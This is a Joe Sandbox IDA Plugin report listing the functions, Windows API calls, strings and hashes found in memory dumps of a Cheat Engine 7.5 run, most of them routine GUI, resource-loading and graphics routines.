Associated: 00000008.00000002.3459542671.000000006B68D000.00000004.00000001.01000000.00000013.sdmpDownload File
Associated: 00000008.00000002.3459603967.000000006B68F000.00000008.00000001.01000000.00000013.sdmpDownload File
Associated: 00000008.00000002.3459696728.000000006B692000.00000004.00000001.01000000.00000013.sdmpDownload File
Associated: 00000008.00000002.3459742082.000000006B694000.00000004.00000001.01000000.00000013.sdmpDownload File
Associated: 00000008.00000002.3459833250.000000006B698000.00000002.00000001.01000000.00000013.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_8_2_6b4c0000_CheatEngine75.jbxd

Similarity

API ID:
String ID: 0#Lk
API String ID: 0-1841850333
Opcode ID: e540865828b2169ed0b51def19f8af775dbecd2e11cb04d2e8cb28fe60f61641
Instruction ID: 389be86249736e3220d5af5d765ba80f856c372388e59ac964555b975df7914e
Opcode Fuzzy Hash: e540865828b2169ed0b51def19f8af775dbecd2e11cb04d2e8cb28fe60f61641
Instruction Fuzzy Hash: 9202AD39E08619EFCB11DF68C880D9FB7B1FF4AB14B118099E915AB350D739AD42CB91

Function 6B4F5A74 Relevance: 19.4, APIs: 10, Strings: 1, Instructions: 110windowCOMMON

Download Yara Rule

APIs

__EH_prolog3_GS.LIBCMT ref: 6B4F5A7B

Part of subcall function 6B4D4ACF: __EH_prolog3.LIBCMT ref: 6B4D4AD6
Part of subcall function 6B4D4ACF: GetDC.USER32(00000000), ref: 6B4D4B02

IsRectEmpty.USER32(?), ref: 6B4F5A96
InvertRect.USER32(?,?), ref: 6B4F5AAC
SetRectEmpty.USER32(?), ref: 6B4F5ABF
GetClientRect.USER32(00000000,00000000), ref: 6B4F5B0C
GetSystemMetrics.USER32(00000015), ref: 6B4F5B2A
GetSystemMetrics.USER32(00000015), ref: 6B4F5B50
SendMessageW.USER32(?,0000120C,00000000,00000001), ref: 6B4F5B91
SendMessageW.USER32(?,0000120C,00000001,00000001), ref: 6B4F5BC1
InvertRect.USER32(?,?), ref: 6B4F5BCD

Strings

0#Lk, xrefs: 6B4F5B78, 6B4F5BAD

Memory Dump Source

Source File: 00000008.00000002.3448503678.000000006B4C1000.00000020.00000001.01000000.00000013.sdmp, Offset: 6B4C0000, based on PE: true

Associated: 00000008.00000002.3448462024.000000006B4C0000.00000002.00000001.01000000.00000013.sdmpDownload File
Associated: 00000008.00000002.3457392843.000000006B638000.00000002.00000001.01000000.00000013.sdmpDownload File
Associated: 00000008.00000002.3459542671.000000006B68D000.00000004.00000001.01000000.00000013.sdmpDownload File
Associated: 00000008.00000002.3459603967.000000006B68F000.00000008.00000001.01000000.00000013.sdmpDownload File
Associated: 00000008.00000002.3459696728.000000006B692000.00000004.00000001.01000000.00000013.sdmpDownload File
Associated: 00000008.00000002.3459742082.000000006B694000.00000004.00000001.01000000.00000013.sdmpDownload File
Associated: 00000008.00000002.3459833250.000000006B698000.00000002.00000001.01000000.00000013.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_8_2_6b4c0000_CheatEngine75.jbxd

Similarity

API ID: Rect$EmptyInvertMessageMetricsSendSystem$ClientH_prolog3H_prolog3_
String ID: 0#Lk
API String ID: 3401445556-1841850333
Opcode ID: 5e76450a6eb2c81ecffe0be2dd57696a9635660eb9cf81cceabadb8aba8859d2
Instruction ID: bc89e50a7229c1277e4ec2915269389658133f68e6e8dc7ab56e03d9811b78af
Opcode Fuzzy Hash: 5e76450a6eb2c81ecffe0be2dd57696a9635660eb9cf81cceabadb8aba8859d2
Instruction Fuzzy Hash: 30418A72800614DFCF05DFA4C988BDD7BB8FF46301F0540A8E909BB265DB78AA45CBA0

Function 6B4EEBA8 Relevance: 17.9, APIs: 9, Strings: 1, Instructions: 355windowCOMMON

Download Yara Rule

APIs

__EH_prolog3.LIBCMT ref: 6B4EEBAF
SendMessageW.USER32(?,000000B0,?,?), ref: 6B4EEBC9
SendMessageW.USER32(00000001,000000C2,00000001,00000001), ref: 6B4EEDB9
MessageBeep.USER32(000000FF), ref: 6B4EEDFB
MessageBeep.USER32(000000FF), ref: 6B4EEFBD

Strings

0#Lk, xrefs: 6B4EED1B

Memory Dump Source

Source File: 00000008.00000002.3448503678.000000006B4C1000.00000020.00000001.01000000.00000013.sdmp, Offset: 6B4C0000, based on PE: true

Associated: 00000008.00000002.3448462024.000000006B4C0000.00000002.00000001.01000000.00000013.sdmpDownload File
Associated: 00000008.00000002.3457392843.000000006B638000.00000002.00000001.01000000.00000013.sdmpDownload File
Associated: 00000008.00000002.3459542671.000000006B68D000.00000004.00000001.01000000.00000013.sdmpDownload File
Associated: 00000008.00000002.3459603967.000000006B68F000.00000008.00000001.01000000.00000013.sdmpDownload File
Associated: 00000008.00000002.3459696728.000000006B692000.00000004.00000001.01000000.00000013.sdmpDownload File
Associated: 00000008.00000002.3459742082.000000006B694000.00000004.00000001.01000000.00000013.sdmpDownload File
Associated: 00000008.00000002.3459833250.000000006B698000.00000002.00000001.01000000.00000013.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_8_2_6b4c0000_CheatEngine75.jbxd

Similarity

API ID: Message$BeepSend$H_prolog3
String ID: 0#Lk
API String ID: 280101887-1841850333
Opcode ID: 3a48eb2159d7c60cb5123b1578347d316d57cbce88ac510294d3a81dd32580bf
Instruction ID: 6ea4339c0e1ecbb215da3281a2ba5fb5fb7351ecbd4addf46d598562db86d073
Opcode Fuzzy Hash: 3a48eb2159d7c60cb5123b1578347d316d57cbce88ac510294d3a81dd32580bf
Instruction Fuzzy Hash: 27D16A75D5011AABCF40DFA4C885EEEB7B9BF48315F104169E911BB280DB38A902CBB1

Function 6B4F6851 Relevance: 15.9, APIs: 7, Strings: 2, Instructions: 171windowCOMMON

Download Yara Rule

APIs

SendMessageW.USER32(?,0000104B,00000000,?), ref: 6B4F6886
CreatePopupMenu.USER32 ref: 6B4F6942
GetMenuDefaultItem.USER32(?,00000000,00000000), ref: 6B4F6981
GetParent.USER32(?), ref: 6B4F69AB
GetParent.USER32(?), ref: 6B4F69FF
GetParent.USER32(?), ref: 6B4F6A12
SendMessageW.USER32(?,?,00000000,00000000), ref: 6B4F6A2C

Strings

$, xrefs: 6B4F69A4
0#Lk, xrefs: 6B4F68C3, 6B4F68E9, 6B4F6908, 6B4F6932, 6B4F696A, 6B4F69F0, 6B4F6A3D, 6B4F6A4D

Memory Dump Source

Source File: 00000008.00000002.3448503678.000000006B4C1000.00000020.00000001.01000000.00000013.sdmp, Offset: 6B4C0000, based on PE: true

Associated: 00000008.00000002.3448462024.000000006B4C0000.00000002.00000001.01000000.00000013.sdmpDownload File
Associated: 00000008.00000002.3457392843.000000006B638000.00000002.00000001.01000000.00000013.sdmpDownload File
Associated: 00000008.00000002.3459542671.000000006B68D000.00000004.00000001.01000000.00000013.sdmpDownload File
Associated: 00000008.00000002.3459603967.000000006B68F000.00000008.00000001.01000000.00000013.sdmpDownload File
Associated: 00000008.00000002.3459696728.000000006B692000.00000004.00000001.01000000.00000013.sdmpDownload File
Associated: 00000008.00000002.3459742082.000000006B694000.00000004.00000001.01000000.00000013.sdmpDownload File
Associated: 00000008.00000002.3459833250.000000006B698000.00000002.00000001.01000000.00000013.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_8_2_6b4c0000_CheatEngine75.jbxd

Similarity

API ID: Parent$MenuMessageSend$CreateDefaultItemPopup
String ID: $$0#Lk
API String ID: 3883924376-1429395334
Opcode ID: f7d63b36a92688373f6c51d39fc6367aa911f719bd2e3c63b4c03ef8f255ad6f
Instruction ID: 2a10580da8f67382e71e7bc23fe9ad551f4ec294af1b91358a6603eb67678b0c
Opcode Fuzzy Hash: f7d63b36a92688373f6c51d39fc6367aa911f719bd2e3c63b4c03ef8f255ad6f
Instruction Fuzzy Hash: 0D514871A00219AFDB10EFA5CD44E9EBBB9EF49700F1040A9E915E72A0EB75D942CF60

Function 6B4F0B95 Relevance: 15.9, APIs: 8, Strings: 1, Instructions: 112windowCOMMON

Download Yara Rule

APIs

GetWindowRect.USER32(?,?), ref: 6B4F0BD7
InvalidateRect.USER32(?,00000000,00000001), ref: 6B4F0C1A
TrackPopupMenu.USER32(?,00000180,?,?,00000000,?,00000000), ref: 6B4F0C75
GetParent.USER32(?), ref: 6B4F0C84
SendMessageW.USER32(?,00000111,?,?), ref: 6B4F0CB6
InvalidateRect.USER32(?,00000000,00000001,00000000), ref: 6B4F0CD6
UpdateWindow.USER32(?), ref: 6B4F0CDF
ReleaseCapture.USER32 ref: 6B4F0CEE

Strings

0#Lk, xrefs: 6B4F0C46

Memory Dump Source

Source File: 00000008.00000002.3448503678.000000006B4C1000.00000020.00000001.01000000.00000013.sdmp, Offset: 6B4C0000, based on PE: true

Associated: 00000008.00000002.3448462024.000000006B4C0000.00000002.00000001.01000000.00000013.sdmpDownload File
Associated: 00000008.00000002.3457392843.000000006B638000.00000002.00000001.01000000.00000013.sdmpDownload File
Associated: 00000008.00000002.3459542671.000000006B68D000.00000004.00000001.01000000.00000013.sdmpDownload File
Associated: 00000008.00000002.3459603967.000000006B68F000.00000008.00000001.01000000.00000013.sdmpDownload File
Associated: 00000008.00000002.3459696728.000000006B692000.00000004.00000001.01000000.00000013.sdmpDownload File
Associated: 00000008.00000002.3459742082.000000006B694000.00000004.00000001.01000000.00000013.sdmpDownload File
Associated: 00000008.00000002.3459833250.000000006B698000.00000002.00000001.01000000.00000013.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_8_2_6b4c0000_CheatEngine75.jbxd

Similarity

API ID: Rect$InvalidateWindow$CaptureMenuMessageParentPopupReleaseSendTrackUpdate
String ID: 0#Lk
API String ID: 2465089168-1841850333
Opcode ID: ac12fd4c931317b72828f52826f67011534e7bb888732725c7f1b0e69363a402
Instruction ID: 33bb63b04167beb2a728fe8c6d217083531d9c330d8c902adaa2f9ee376317b9
Opcode Fuzzy Hash: ac12fd4c931317b72828f52826f67011534e7bb888732725c7f1b0e69363a402
Instruction Fuzzy Hash: C0412BB0A04706FFDB089F75C984BAAFBB9FB89701F00016AE51993250D778A951CFA1

Function 6B4E3B4B Relevance: 14.1, APIs: 6, Strings: 2, Instructions: 135memoryCOMMON

Download Yara Rule

APIs

Part of subcall function 6B4D3951: __EH_prolog3_catch.LIBCMT ref: 6B4D3958

GetModuleHandleW.KERNEL32(comctl32.dll,6B4E3C93,?,00000000,?,?,?,6B4DC01D,?,?,6B4DAA84,0000001C,6B4DBE17,?,6B4DAA84), ref: 6B4E3B7F
GetUserDefaultUILanguage.KERNEL32(?,?,6B4DC01D,?,?,6B4DAA84,0000001C,6B4DBE17,?,6B4DAA84), ref: 6B4E3B90
FindResourceExW.KERNEL32(?,00000005,?,0000FC11,?,?,6B4DC01D,?,?,6B4DAA84,0000001C,6B4DBE17,?,6B4DAA84), ref: 6B4E3BCF
FindResourceW.KERNEL32(?,?,00000005,?,?,6B4DC01D,?,?,6B4DAA84,0000001C,6B4DBE17,?,6B4DAA84), ref: 6B4E3BEC
LoadResource.KERNEL32(?,00000000,?,?,6B4DC01D,?,?,6B4DAA84,0000001C,6B4DBE17,?,6B4DAA84), ref: 6B4E3BFA

Part of subcall function 6B4E3CD1: GetDC.USER32(00000000), ref: 6B4E3D24
Part of subcall function 6B4E3CD1: EnumFontFamiliesExW.GDI32(00000000,?,6B4E3CBB,?,00000000,?,?,?,?,?,?,00000000), ref: 6B4E3D3F
Part of subcall function 6B4E3CD1: ReleaseDC.USER32(00000000,00000000), ref: 6B4E3D47

GlobalAlloc.KERNEL32(00000040,00000000,?,?,6B4DC01D,?,?,6B4DAA84,0000001C,6B4DBE17,?,6B4DAA84), ref: 6B4E3C2A

Strings

MS UI Gothic, xrefs: 6B4E3BA7
comctl32.dll, xrefs: 6B4E3B7A

Memory Dump Source

Source File: 00000008.00000002.3448503678.000000006B4C1000.00000020.00000001.01000000.00000013.sdmp, Offset: 6B4C0000, based on PE: true

Associated: 00000008.00000002.3448462024.000000006B4C0000.00000002.00000001.01000000.00000013.sdmpDownload File
Associated: 00000008.00000002.3457392843.000000006B638000.00000002.00000001.01000000.00000013.sdmpDownload File
Associated: 00000008.00000002.3459542671.000000006B68D000.00000004.00000001.01000000.00000013.sdmpDownload File
Associated: 00000008.00000002.3459603967.000000006B68F000.00000008.00000001.01000000.00000013.sdmpDownload File
Associated: 00000008.00000002.3459696728.000000006B692000.00000004.00000001.01000000.00000013.sdmpDownload File
Associated: 00000008.00000002.3459742082.000000006B694000.00000004.00000001.01000000.00000013.sdmpDownload File
Associated: 00000008.00000002.3459833250.000000006B698000.00000002.00000001.01000000.00000013.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_8_2_6b4c0000_CheatEngine75.jbxd

Similarity

API ID: Resource$Find$AllocDefaultEnumFamiliesFontGlobalH_prolog3_catchHandleLanguageLoadModuleReleaseUser
String ID: MS UI Gothic$comctl32.dll
API String ID: 3737665285-3248924666
Opcode ID: c7a9bab3ac37e6441f7bd49de9e88477db1e3a3a7bd59ccbb2bc757623c20eb7
Instruction ID: d3d038f7c3726dcd1aff538c577cd0430ca3d881b4e0ab4fd1f043e1a5473e1c
Opcode Fuzzy Hash: c7a9bab3ac37e6441f7bd49de9e88477db1e3a3a7bd59ccbb2bc757623c20eb7
Instruction Fuzzy Hash: C541E576600606AFEB226B75CC4AF6B73A9EF41715B00446CF816CB3A0EB38ED418771

Function 6B50195D Relevance: 14.1, APIs: 7, Strings: 1, Instructions: 80memoryCOMMON

Download Yara Rule

APIs

GlobalAlloc.KERNEL32(00000002,00000000,00000000,00000000,?,?,6B501952,00000000,00000000,?,86dk,?,6B50278D,?,00000000,?), ref: 6B50196A
GlobalLock.KERNEL32(00000000), ref: 6B50197F
CreateStreamOnHGlobal.OLE32(00000000,00000001,00000000,00000000), ref: 6B50199B
EnterCriticalSection.KERNEL32(6B694B00), ref: 6B5019B6
LeaveCriticalSection.KERNEL32(6B694B00,00000000), ref: 6B501A22
GlobalUnlock.KERNEL32(00000000), ref: 6B501A29
GlobalFree.KERNEL32(00000000), ref: 6B501A30

Strings

0#Lk, xrefs: 6B5019F7

Memory Dump Source

Source File: 00000008.00000002.3448503678.000000006B4C1000.00000020.00000001.01000000.00000013.sdmp, Offset: 6B4C0000, based on PE: true

Associated: 00000008.00000002.3448462024.000000006B4C0000.00000002.00000001.01000000.00000013.sdmpDownload File
Associated: 00000008.00000002.3457392843.000000006B638000.00000002.00000001.01000000.00000013.sdmpDownload File
Associated: 00000008.00000002.3459542671.000000006B68D000.00000004.00000001.01000000.00000013.sdmpDownload File
Associated: 00000008.00000002.3459603967.000000006B68F000.00000008.00000001.01000000.00000013.sdmpDownload File
Associated: 00000008.00000002.3459696728.000000006B692000.00000004.00000001.01000000.00000013.sdmpDownload File
Associated: 00000008.00000002.3459742082.000000006B694000.00000004.00000001.01000000.00000013.sdmpDownload File
Associated: 00000008.00000002.3459833250.000000006B698000.00000002.00000001.01000000.00000013.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_8_2_6b4c0000_CheatEngine75.jbxd

Similarity

API ID: Global$CriticalSection$AllocCreateEnterFreeLeaveLockStreamUnlock
String ID: 0#Lk
API String ID: 56479573-1841850333
Opcode ID: 6d78d9c389276954f7c996e3e7304199d1e42ed5bf21b686f0c8998671710e37
Instruction ID: ca1a77a771cae5377780480103b6210bed250a16295fae24e37761ff6309a8cc
Opcode Fuzzy Hash: 6d78d9c389276954f7c996e3e7304199d1e42ed5bf21b686f0c8998671710e37
Instruction Fuzzy Hash: C321A135600212AFEF24ABB6CC59BAE37A9EF46659F000068F511D3250DFB8C901DBA2

Function 6B4D8925 Relevance: 14.0, APIs: 5, Strings: 3, Instructions: 49libraryloaderCOMMON

Download Yara Rule

APIs

GetModuleHandleW.KERNEL32(uxtheme.dll), ref: 6B4D8937
GetProcAddress.KERNEL32(00000000,DrawThemeTextEx), ref: 6B4D8947
EncodePointer.KERNEL32(00000000), ref: 6B4D8950
DecodePointer.KERNEL32(00000000), ref: 6B4D895E
DrawThemeText.UXTHEME(?,?,?,?,?,?,?,00000000,?), ref: 6B4D89AB

Strings

uxtheme.dll, xrefs: 6B4D8932
DrawThemeTextEx, xrefs: 6B4D8941
0#Lk, xrefs: 6B4D8987

Memory Dump Source

Source File: 00000008.00000002.3448503678.000000006B4C1000.00000020.00000001.01000000.00000013.sdmp, Offset: 6B4C0000, based on PE: true

Associated: 00000008.00000002.3448462024.000000006B4C0000.00000002.00000001.01000000.00000013.sdmpDownload File
Associated: 00000008.00000002.3457392843.000000006B638000.00000002.00000001.01000000.00000013.sdmpDownload File
Associated: 00000008.00000002.3459542671.000000006B68D000.00000004.00000001.01000000.00000013.sdmpDownload File
Associated: 00000008.00000002.3459603967.000000006B68F000.00000008.00000001.01000000.00000013.sdmpDownload File
Associated: 00000008.00000002.3459696728.000000006B692000.00000004.00000001.01000000.00000013.sdmpDownload File
Associated: 00000008.00000002.3459742082.000000006B694000.00000004.00000001.01000000.00000013.sdmpDownload File
Associated: 00000008.00000002.3459833250.000000006B698000.00000002.00000001.01000000.00000013.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_8_2_6b4c0000_CheatEngine75.jbxd

Similarity

API ID: Pointer$AddressDecodeDrawEncodeHandleModuleProcTextTheme
String ID: 0#Lk$DrawThemeTextEx$uxtheme.dll
API String ID: 1727381832-3457611663
Opcode ID: c75aa03e7e622683cd2463f09a2817fb9f76958784512b90b701dab0021e012c
Instruction ID: 19636436005c2c2e98fbfea99f5865d9d707227e0e0ae1120d081c115383219e
Opcode Fuzzy Hash: c75aa03e7e622683cd2463f09a2817fb9f76958784512b90b701dab0021e012c
Instruction Fuzzy Hash: E911B33250025AEBDF126FA1CC18DEA3F76FF0E795B046150FE55A1220C73AD822AB91

Function 6B4C8977 Relevance: 13.6, APIs: 9, Instructions: 121windowCOMMON

Download Yara Rule

APIs

__EH_prolog3_GS.LIBCMT ref: 6B4C8981
SendMessageW.USER32(?,00000000,00000000,00000080), ref: 6B4C89C8
SendMessageW.USER32(?,00000000,00000000,?), ref: 6B4C89F4
ValidateRect.USER32(?,00000000), ref: 6B4C8A07

Part of subcall function 6B4D7145: GetClientRect.USER32(?,?), ref: 6B4D71AF

GetClientRect.USER32(?,?), ref: 6B4C8A7F
BeginPaint.USER32(?,?), ref: 6B4C8A8C
SendMessageW.USER32(?,00000000,00000000,?), ref: 6B4C8AC2
SendMessageW.USER32(?,00000000,00000000), ref: 6B4C8AE4
EndPaint.USER32(?,?), ref: 6B4C8AFC

Memory Dump Source

Source File: 00000008.00000002.3448503678.000000006B4C1000.00000020.00000001.01000000.00000013.sdmp, Offset: 6B4C0000, based on PE: true

Associated: 00000008.00000002.3448462024.000000006B4C0000.00000002.00000001.01000000.00000013.sdmpDownload File
Associated: 00000008.00000002.3457392843.000000006B638000.00000002.00000001.01000000.00000013.sdmpDownload File
Associated: 00000008.00000002.3459542671.000000006B68D000.00000004.00000001.01000000.00000013.sdmpDownload File
Associated: 00000008.00000002.3459603967.000000006B68F000.00000008.00000001.01000000.00000013.sdmpDownload File
Associated: 00000008.00000002.3459696728.000000006B692000.00000004.00000001.01000000.00000013.sdmpDownload File
Associated: 00000008.00000002.3459742082.000000006B694000.00000004.00000001.01000000.00000013.sdmpDownload File
Associated: 00000008.00000002.3459833250.000000006B698000.00000002.00000001.01000000.00000013.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_8_2_6b4c0000_CheatEngine75.jbxd

Similarity

API ID: MessageSend$Rect$ClientPaint$BeginH_prolog3_Validate
String ID:
API String ID: 3883544035-0
Opcode ID: f78f1a7312592bdeee035eef4a9b8748cd1f1cc2ff8cef9c4cc765549f5dd929
Instruction ID: 8cc3339777eb56f35ac9133158b7d836a3faa721ca8b3a99bc3041d5da327fa3
Opcode Fuzzy Hash: f78f1a7312592bdeee035eef4a9b8748cd1f1cc2ff8cef9c4cc765549f5dd929
Instruction Fuzzy Hash: 2941A175A00609EFCF21AFB1CC95EAEB7B6FF49704F00456DE15AA2260EB799900CF51

Function 6B4CE873 Relevance: 13.6, APIs: 9, Instructions: 89windowCOMMONLIBRARYCODE

Download Yara Rule

APIs

__EH_prolog3.LIBCMT ref: 6B4CE87A
GetMenuItemCount.USER32(80004005), ref: 6B4CE8C0
GetMenuItemCount.USER32(00000000), ref: 6B4CE8CC
GetSubMenu.USER32(00000000,-00000001), ref: 6B4CE8E3
GetMenuItemCount.USER32(00000000), ref: 6B4CE8F6
GetSubMenu.USER32(00000000,00000000), ref: 6B4CE907
RemoveMenu.USER32(00000000,00000000,00000400,?,?,?,?,?,6B4C3914,6B67BC7C,0000000C,00000004,6B4C28D8,00000000), ref: 6B4CE921

Memory Dump Source

Source File: 00000008.00000002.3448503678.000000006B4C1000.00000020.00000001.01000000.00000013.sdmp, Offset: 6B4C0000, based on PE: true

Associated: 00000008.00000002.3448462024.000000006B4C0000.00000002.00000001.01000000.00000013.sdmpDownload File
Associated: 00000008.00000002.3457392843.000000006B638000.00000002.00000001.01000000.00000013.sdmpDownload File
Associated: 00000008.00000002.3459542671.000000006B68D000.00000004.00000001.01000000.00000013.sdmpDownload File
Associated: 00000008.00000002.3459603967.000000006B68F000.00000008.00000001.01000000.00000013.sdmpDownload File
Associated: 00000008.00000002.3459696728.000000006B692000.00000004.00000001.01000000.00000013.sdmpDownload File
Associated: 00000008.00000002.3459742082.000000006B694000.00000004.00000001.01000000.00000013.sdmpDownload File
Associated: 00000008.00000002.3459833250.000000006B698000.00000002.00000001.01000000.00000013.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_8_2_6b4c0000_CheatEngine75.jbxd

Similarity

API ID: Menu$CountItem$H_prolog3Remove
String ID:
API String ID: 3061525546-0
Opcode ID: 586e76a02c9ba9a8802ebe8b0df60d1d422b1769e45f81f3187b4d8c3f21a69e
Instruction ID: 44a2beed8dfbe07ac8e654434aad14cd3accc838083f9248d769044d968b4c7b
Opcode Fuzzy Hash: 586e76a02c9ba9a8802ebe8b0df60d1d422b1769e45f81f3187b4d8c3f21a69e
Instruction Fuzzy Hash: 2B21DA7994020AEBEF509F69CC8AF9F3FB9EF41B10F005129F515E6250DB78EA018B91

Function 6B4D0F57 Relevance: 12.5, APIs: 3, Strings: 4, Instructions: 265COMMON

Download Yara Rule

APIs

__EH_prolog3_GS.LIBCMT ref: 6B4D0FFE
CoCreateGuid.OLE32(?,00000034), ref: 6B4D104F
SysFreeString.OLEAUT32(?), ref: 6B4D1228

Strings

RestartByRestartManager, xrefs: 6B4D10D2, 6B4D10D7, 6B4D10DF
Zfk, xrefs: 6B4D103F
%08lX-%04X-%04x-%02X%02X-%02X%02X%02X%02X%02X%02X, xrefs: 6B4D1099
0#Lk, xrefs: 6B4D0FD5, 6B4D114C, 6B4D1168, 6B4D1186, 6B4D119D, 6B4D11B4, 6B4D11E8, 6B4D1218

Memory Dump Source

Source File: 00000008.00000002.3448503678.000000006B4C1000.00000020.00000001.01000000.00000013.sdmp, Offset: 6B4C0000, based on PE: true

Associated: 00000008.00000002.3448462024.000000006B4C0000.00000002.00000001.01000000.00000013.sdmpDownload File
Associated: 00000008.00000002.3457392843.000000006B638000.00000002.00000001.01000000.00000013.sdmpDownload File
Associated: 00000008.00000002.3459542671.000000006B68D000.00000004.00000001.01000000.00000013.sdmpDownload File
Associated: 00000008.00000002.3459603967.000000006B68F000.00000008.00000001.01000000.00000013.sdmpDownload File
Associated: 00000008.00000002.3459696728.000000006B692000.00000004.00000001.01000000.00000013.sdmpDownload File
Associated: 00000008.00000002.3459742082.000000006B694000.00000004.00000001.01000000.00000013.sdmpDownload File
Associated: 00000008.00000002.3459833250.000000006B698000.00000002.00000001.01000000.00000013.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_8_2_6b4c0000_CheatEngine75.jbxd

Similarity

API ID: CreateFreeGuidH_prolog3_String
String ID: %08lX-%04X-%04x-%02X%02X-%02X%02X%02X%02X%02X%02X$0#Lk$RestartByRestartManager$Zfk
API String ID: 1084067465-1392503517
Opcode ID: 218139c8ce68faec7c050987d0c9bd22ec3c75807ac1f7c3b3940590abebca98
Instruction ID: ebf44492b0a41f630295b895a1c6f83e1e0e673c47bf3a8b14413057daa46c07
Opcode Fuzzy Hash: 218139c8ce68faec7c050987d0c9bd22ec3c75807ac1f7c3b3940590abebca98
Instruction Fuzzy Hash: DF919F71A00119AFCF05DBB8C8A5EFEB7B9AF49214F14006DE901A7391DF78AD05DBA1

Function 6B4FF94E Relevance: 12.5, APIs: 5, Strings: 2, Instructions: 253windowCOMMON

Download Yara Rule

APIs

Part of subcall function 6B500DEF: GdipGetImagePixelFormat.GDIPLUS(?,?,00000000,00000000,?,6B4FF994,A934EE1E,00000000,00000000,?), ref: 6B500DFD

GdipBitmapLockBits.GDIPLUS(00000007,?,00000001,?,00000000,00000000,00000000,?,00000000,00000000,00000000,A934EE1E,00000000,00000000,?), ref: 6B4FFB62
GdipBitmapUnlockBits.GDIPLUS(00000007,00000000,00000007,?,00000001,?,00000000,00000000,00000000,?,00000000,00000000,00000000,A934EE1E,00000000,00000000), ref: 6B4FFC4E
GdipDrawImageI.GDIPLUS(?,00000000,00000000,00000000,?,?,?,?,00022009,?,00000000,00000000,?,00000000,00000000,00000000), ref: 6B4FFCA0
GdipDeleteGraphics.GDIPLUS(?,?,00000000,00000000,00000000,?,?,?,?,00022009,?,00000000,00000000,?,00000000,00000000), ref: 6B4FFCAB
GdipDisposeImage.GDIPLUS(?,?,?,00000000,00000000,00000000,?,?,?,?,00022009,?,00000000,00000000,?,00000000), ref: 6B4FFCB6

Strings

5dk, xrefs: 6B4FF95E
&, xrefs: 6B4FF9D5

Memory Dump Source

Source File: 00000008.00000002.3448503678.000000006B4C1000.00000020.00000001.01000000.00000013.sdmp, Offset: 6B4C0000, based on PE: true

Associated: 00000008.00000002.3448462024.000000006B4C0000.00000002.00000001.01000000.00000013.sdmpDownload File
Associated: 00000008.00000002.3457392843.000000006B638000.00000002.00000001.01000000.00000013.sdmpDownload File
Associated: 00000008.00000002.3459542671.000000006B68D000.00000004.00000001.01000000.00000013.sdmpDownload File
Associated: 00000008.00000002.3459603967.000000006B68F000.00000008.00000001.01000000.00000013.sdmpDownload File
Associated: 00000008.00000002.3459696728.000000006B692000.00000004.00000001.01000000.00000013.sdmpDownload File
Associated: 00000008.00000002.3459742082.000000006B694000.00000004.00000001.01000000.00000013.sdmpDownload File
Associated: 00000008.00000002.3459833250.000000006B698000.00000002.00000001.01000000.00000013.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_8_2_6b4c0000_CheatEngine75.jbxd

Similarity

API ID: Gdip$Image$BitmapBits$DeleteDisposeDrawFormatGraphicsLockPixelUnlock
String ID: &$5dk
API String ID: 3470019100-293510559
Opcode ID: fb638083bbc56b2cacb41559a953f776b509bb5d012526c324a99b71d4a53ed2
Instruction ID: cdcad46b8f2b6486d0c2ced5ce72698a2c5fc15bde2b926d18cc45253dc86839
Opcode Fuzzy Hash: fb638083bbc56b2cacb41559a953f776b509bb5d012526c324a99b71d4a53ed2
Instruction Fuzzy Hash: FBA140F19021299BDB24CF24CD91B99B7B8FF44354F4045E9EA09A7341DB34AE85CFA8

Function 6B501A50 Relevance: 12.4, APIs: 5, Strings: 2, Instructions: 158COMMON

Download Yara Rule

APIs

LoadImageW.USER32(00000000,?,00000000,00000000,00000000,00002000), ref: 6B501B3B
GetObjectW.GDI32(00000000,00000018,?), ref: 6B501B56
DeleteObject.GDI32(?), ref: 6B501B63
DeleteObject.GDI32(00000000), ref: 6B501BE3

Part of subcall function 6B50286D: GetObjectW.GDI32(?,00000054,?), ref: 6B502887

__EH_prolog3.LIBCMT ref: 6B501A57

Part of subcall function 6B4D957B: DeleteObject.GDI32(?), ref: 6B4D958D

Part of subcall function 6B5018F9: FindResourceW.KERNEL32(00000000,?,PNG,?,?,?,86dk,?,6B50278D,?,00000000,?), ref: 6B50191B
Part of subcall function 6B5018F9: LoadResource.KERNEL32(00000000,00000000,?,86dk,?,6B50278D,?,00000000,?), ref: 6B501929
Part of subcall function 6B5018F9: LockResource.KERNEL32(00000000,?,86dk,?,6B50278D,?,00000000,?), ref: 6B501934
Part of subcall function 6B5018F9: SizeofResource.KERNEL32(00000000,00000000,?,86dk,?,6B50278D,?,00000000,?), ref: 6B501942

Strings

86dk, xrefs: 6B501AC6
, xrefs: 6B501B6E

Memory Dump Source

Source File: 00000008.00000002.3448503678.000000006B4C1000.00000020.00000001.01000000.00000013.sdmp, Offset: 6B4C0000, based on PE: true

Associated: 00000008.00000002.3448462024.000000006B4C0000.00000002.00000001.01000000.00000013.sdmpDownload File
Associated: 00000008.00000002.3457392843.000000006B638000.00000002.00000001.01000000.00000013.sdmpDownload File
Associated: 00000008.00000002.3459542671.000000006B68D000.00000004.00000001.01000000.00000013.sdmpDownload File
Associated: 00000008.00000002.3459603967.000000006B68F000.00000008.00000001.01000000.00000013.sdmpDownload File
Associated: 00000008.00000002.3459696728.000000006B692000.00000004.00000001.01000000.00000013.sdmpDownload File
Associated: 00000008.00000002.3459742082.000000006B694000.00000004.00000001.01000000.00000013.sdmpDownload File
Associated: 00000008.00000002.3459833250.000000006B698000.00000002.00000001.01000000.00000013.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_8_2_6b4c0000_CheatEngine75.jbxd

Similarity

API ID: Object$Resource$Delete$Load$FindH_prolog3ImageLockSizeof
String ID: $86dk
API String ID: 1337615151-1286042190
Opcode ID: 13fbf060e2a91f090b9f9e8953b55f4ad866a0389c58df321e74464d2044b469
